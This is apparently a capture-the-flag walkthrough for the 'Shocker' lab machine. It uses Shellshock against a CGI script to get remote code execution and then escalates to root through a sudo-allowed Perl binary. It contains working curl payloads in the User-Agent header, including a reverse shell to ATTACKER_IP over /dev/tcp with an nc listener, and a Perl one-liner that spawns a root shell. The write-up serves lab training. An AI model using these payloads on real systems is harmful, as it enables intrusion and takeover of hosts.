Shocker is a classic Shellshock exploitation machine.
A vulnerable CGI script under /cgi-bin/ allows remote command execution via the Shellshock bug.
Privilege escalation is trivial through a sudo‑allowed Perl binary.
Target: shocker.htb
Initial vector: Shellshock RCE via CGI script
Privilege escalation: sudo Perl → root
Nmap:
80/tcp http (Apache 2.4.18) 2222/tcp ssh (OpenSSH 7.2p2)
Directory fuzzing reveals:
/cgi-bin/
Fuzzing inside /cgi-bin/:
$ wfuzz -w directory-list-2.3-medium.txt -z list,sh,pl,py,cgi \ --hc 404 http://shocker.htb/cgi-bin/FUZZ.FUZ2Z -> user.sh
A CGI script named user.sh is present — a strong indicator of Shellshock vulnerability.
Test the vulnerability using the User-Agent header:
$ curl -s -X GET "http://shocker.htb/cgi-bin/user.sh" \
-H 'User-Agent: () { :; }; echo; /usr/bin/whoami'
If the output is www-data, the script is vulnerable.
Listener:
$ nc -nlvp 777
Exploit:
$ curl -s -X GET "http://shocker.htb/cgi-bin/user.sh" \
-H 'User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/ATTACKER_IP/777 0>&1'
A shell is obtained as www-data.
Alternatively, Shellshock can be tested using Nmap:
$ sudo nmap --script http-shellshock -p80 shocker.htb \ --script-args uri=/cgi-bin/user.sh,cmd=/usr/bin/id
Check sudo permissions:
$ sudo -l -> (root) NOPASSWD: /usr/bin/perl
Perl can be used to spawn a root shell:
$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
Root access obtained.
Shocker is a straightforward exploitation path: discover a CGI script, exploit Shellshock for RCE, and escalate to root via a sudo‑allowed Perl binary. A perfect example of classic web exploitation combined with simple privilege escalation.